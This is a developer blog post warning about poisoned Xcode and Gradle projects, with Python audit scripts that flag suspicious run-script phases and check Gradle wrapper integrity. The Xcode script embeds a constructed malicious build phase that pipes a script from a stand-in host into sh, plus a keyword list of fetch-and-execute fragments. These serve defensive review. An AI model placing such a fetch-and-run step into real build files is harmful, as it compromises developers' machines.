Checking for Poisoned Projects, Again

A bit less than two months ago, I wrote “Checking for Poisoned Projects”. This outlined how malware was embedded in a Visual Studio project: not in the app the project would build, but in the project itself. Designed to infect security researchers, this malware was distributed as a Windows DLL that would be executed through “build events” on the researchers’ machines.

Today, we find out that iOS developers were attacked in a similar fashion. Apparently, Xcode offers “run scripts” that run as part of the build process. In this case, the run script downloaded spyware and installed it on the developers’ machines.
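Xcode keeps each run script phase in the project file as a `PBXShellScriptBuildPhase` object whose `shellScript` string executes on the developer's machine during every build, so those phases are the first thing to read in a project pulled from the Internet. The script below is an added example, not code from the original post or from Apple: a small regex reader that lists every such phase and marks scripts containing fragments (`curl`, `| sh`, `base64`, and so on) that usually mean something is fetched or executed from outside the repository. The `project.pbxproj` text it parses is constructed for this example and is not a real project.

```python
"""List the "run script" build phases in an Xcode project.pbxproj.

Added example, not code from the original post or from Apple. The pbxproj
sample below is constructed: one ordinary phase (a linter) and one phase of
the kind the post describes, which fetches a script from the network and
runs it.
"""
import re

# Fragments that usually mean a build phase fetches or executes content from
# outside the repository. A hit is a prompt for a human to read the script.
REVIEW_PATTERNS = ("curl", "wget", "| sh", "| bash", "base64", "eval ", "launchctl")

# One pbxproj object: "= {" then its body up to the "};" that starts a line.
# Newlines inside quoted strings are escaped as \n, so a real newline
# followed by "};" can only be the end of an object.
OBJECT_RE = re.compile(r"= \{\n(.*?)\n\s*\};", re.S)
NAME_RE = re.compile(r'\n\s*name = (?:"((?:[^"\\]|\\.)*)"|([^;]+));')
SHELL_RE = re.compile(r'\n\s*shellPath = (?:"((?:[^"\\]|\\.)*)"|([^;]+));')
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')

SAMPLE_PBXPROJ = """// !$*UTF8*$!
{
    objects = {
/* Begin PBXShellScriptBuildPhase section */
        A1B2C3D4E5F60718293A4B5C /* SwiftLint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = SwiftLint;
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\\n";
        };
        0F1E2D3C4B5A69788796A5B4 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Run Script";
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "# constructed example of the pattern in the post\\ncurl -fsSL https://updates.example.invalid/setup.sh | sh\\n";
        };
/* End PBXShellScriptBuildPhase section */
    };
}
"""


def unescape_pbx(s: str) -> str:
    """Undo the backslash escapes pbxproj uses inside quoted strings."""
    table = {"n": "\n", "t": "\t", '"': '"', "\\": "\\"}
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(table.get(s[i + 1], s[i + 1]))
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def _quoted_or_bare(match) -> str:
    """pbxproj values are either "quoted" or bare identifiers; return whichever matched."""
    if match is None:
        return ""
    return (match.group(1) if match.group(1) is not None else match.group(2)).strip()


def list_script_phases(pbxproj: str) -> list:
    """Return one dict per PBXShellScriptBuildPhase: name, shell, script, flags."""
    start = pbxproj.find("/* Begin PBXShellScriptBuildPhase section */")
    end = pbxproj.find("/* End PBXShellScriptBuildPhase section */")
    section = pbxproj[start:end] if start != -1 and end != -1 else pbxproj
    phases = []
    for obj in OBJECT_RE.finditer(section):
        body = "\n" + obj.group(1)
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        script_match = SCRIPT_RE.search(body)
        script = unescape_pbx(script_match.group(1)) if script_match else ""
        phases.append({
            "name": _quoted_or_bare(NAME_RE.search(body)) or "(unnamed)",
            "shell": _quoted_or_bare(SHELL_RE.search(body)) or "/bin/sh",
            "script": script,
            "flags": [p for p in REVIEW_PATTERNS if p in script],
        })
    return phases


if __name__ == "__main__":
    for phase in list_script_phases(SAMPLE_PBXPROJ):
        marker = "REVIEW" if phase["flags"] else "ok"
        print(f"[{marker}] {phase['name']} ({phase['shell']}): {phase['script'].strip()!r}")
```

Run it against a real project with `list_script_phases(open("App.xcodeproj/project.pbxproj").read())`; the flags are only a triage aid, and every listed script deserves a read regardless of whether it was flagged.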

It is merely a matter of time before we find out that Android developers are being similarly attacked.

Please be very, very careful when working with projects that you get from the Internet, including from popular sources like GitHub. In “Checking for Poisoned Projects”, I point out some of the standard developer security advice regarding using somebody else’s project that I have been giving for years. Basically, be very careful about the Gradle wrapper, as that is an easy way for an attacker to get malware onto your development machine. There are other attack avenues as well, such as Gradle plugins, compiler plugins, and annotation processors, that we need to worry about.
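The Gradle wrapper is dangerous precisely because `gradle-wrapper.jar` and `gradlew` run on your machine before any Gradle distribution is downloaded, and `gradle-wrapper.properties` decides where that distribution comes from. The following pre-flight audit is an added example, not code from the original post or from Gradle: it reads the wrapper properties, flags a `distributionUrl` that is not HTTPS or not on `services.gradle.org`, flags a missing `distributionSha256Sum` pin, and compares the SHA-256 of `gradle-wrapper.jar` against a set of trusted digests supplied by the caller. The sample projects it audits are constructed in a temporary directory and are not real Gradle projects; the `0` * 64 checksum and the jar contents are placeholders. For a real project, take the trusted jar digests from the "Wrapper JAR checksum" column at https://gradle.org/release-checksums/.

```python
"""Pre-flight audit of a Gradle project's wrapper before ./gradlew is run.

Added example, not code from the original post or from Gradle. It checks the
parts of a checked-out project that execute locally before any distribution
is fetched: gradle-wrapper.properties (download source and checksum pin) and
gradle-wrapper.jar (the code that does the downloading). Trusted jar digests
are supplied by the caller.
"""
import hashlib
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Only the official distribution host is accepted without a finding.
TRUSTED_DISTRIBUTION_HOSTS = {"services.gradle.org"}


def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def parse_wrapper_properties(text: str) -> dict:
    """Minimal java.util.Properties reader: key=value lines, '\\:' unescaped."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")) or "=" not in line:
            continue
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip().replace("\\:", ":")
    return props


def audit_gradle_wrapper(project_root: Path, trusted_jar_sha256: set) -> list:
    """Return findings as strings; an empty list means the wrapper looked as expected."""
    findings = []
    wrapper_dir = project_root / "gradle" / "wrapper"
    props_path = wrapper_dir / "gradle-wrapper.properties"
    jar_path = wrapper_dir / "gradle-wrapper.jar"

    if not props_path.is_file():
        return ["gradle-wrapper.properties is missing; nothing to verify"]
    props = parse_wrapper_properties(props_path.read_text())

    url = props.get("distributionUrl", "")
    parsed = urlparse(url)
    if parsed.scheme != "https":
        findings.append(f"distributionUrl is not https: {url!r}")
    if parsed.hostname not in TRUSTED_DISTRIBUTION_HOSTS:
        findings.append(f"distributionUrl host {parsed.hostname!r} is not an official Gradle host")
    if "distributionSha256Sum" not in props:
        findings.append("distributionSha256Sum is not set; the downloaded distribution will not be checksum-verified")

    if not jar_path.is_file():
        findings.append("gradle-wrapper.jar is missing")
    else:
        digest = sha256_of(jar_path)
        if digest not in trusted_jar_sha256:
            findings.append(f"gradle-wrapper.jar sha256 {digest} does not match any trusted wrapper jar")
    return findings


def make_sample_project(root: Path, distribution_url: str, pin_checksum: bool,
                        jar_bytes: bytes) -> Path:
    """Constructed stand-in for a checked-out project (not a real Gradle project)."""
    wrapper_dir = root / "gradle" / "wrapper"
    wrapper_dir.mkdir(parents=True)
    lines = [
        "distributionBase=GRADLE_USER_HOME",
        "distributionPath=wrapper/dists",
        "distributionUrl=" + distribution_url.replace(":", "\\:"),
    ]
    if pin_checksum:
        # Placeholder digest; a real project pins the published distribution checksum.
        lines.append("distributionSha256Sum=" + "0" * 64)
    (wrapper_dir / "gradle-wrapper.properties").write_text("\n".join(lines) + "\n")
    (wrapper_dir / "gradle-wrapper.jar").write_bytes(jar_bytes)
    return root


def demo() -> dict:
    """Audit one well-formed and one tampered sample project; returns findings per project."""
    trusted_jar = b"PK\x03\x04 constructed stand-in for the official wrapper jar"
    with tempfile.TemporaryDirectory() as tmp:
        good = make_sample_project(Path(tmp) / "good",
                                   "https://services.gradle.org/distributions/gradle-7.0-bin.zip",
                                   True, trusted_jar)
        bad = make_sample_project(Path(tmp) / "bad",
                                  "http://downloads.example.invalid/gradle-7.0-bin.zip",
                                  False, b"PK\x03\x04 something else entirely")
        trusted = {sha256_of(good / "gradle" / "wrapper" / "gradle-wrapper.jar")}
        return {"good": audit_gradle_wrapper(good, trusted),
                "bad": audit_gradle_wrapper(bad, trusted)}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings or ["no findings"])
```

The audit deliberately does not try to verify `gradlew` itself; the script is a few hundred lines and easiest to check by diffing it against the one a fresh `gradle wrapper` invocation generates. The `distributionSha256Sum` pin the audit asks for is set with Gradle's own `gradle wrapper --gradle-version <version> --gradle-distribution-sha256-sum <sha256>`.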

It would be lovely if somehow Android app development was immune to this sort of problem. That is very unrealistic. Someday, I fear that we will get a better picture of exactly how unrealistic it is.

Published on March 18, 2021 16:43